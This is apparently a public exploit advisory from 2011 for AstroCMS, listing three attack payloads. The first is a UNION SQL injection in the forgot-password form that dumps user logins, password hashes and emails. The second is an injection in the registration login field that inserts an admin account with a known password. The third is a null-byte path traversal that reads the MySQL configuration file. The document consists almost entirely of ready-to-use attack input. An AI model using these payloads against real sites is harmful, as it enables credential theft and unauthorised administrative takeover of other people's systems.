# Exploit Title: AstroCMS Multiple Remote Vulnerabilities# Google Dork: none# Date: 12.03.2011# Author: brain[pillow]# Software Link: http://www.astrocms.com/# Version: UNKNOWN============================================================
FORGOT_PASSWORD SQL-INJ EXPLOIT:============================================================/registration/forgot/
a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0from auth_users where id=5#id=6- usually admin
============================================================
REGISTER_USER EXPLOIT:============================================================/registration/
adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')#
Submitting this to "login field" will add "adrnin" user with admin rights and password "123123".
Usually 5-is admin group.============================================================
READ FILE EXPLOIT:============================================================/include/get_js.php4?fname=../htdocs/include/config_mysql.inc%00.js
OR:/include/get_js.php?fname=../htdocs/include/config_mysql.inc%00.js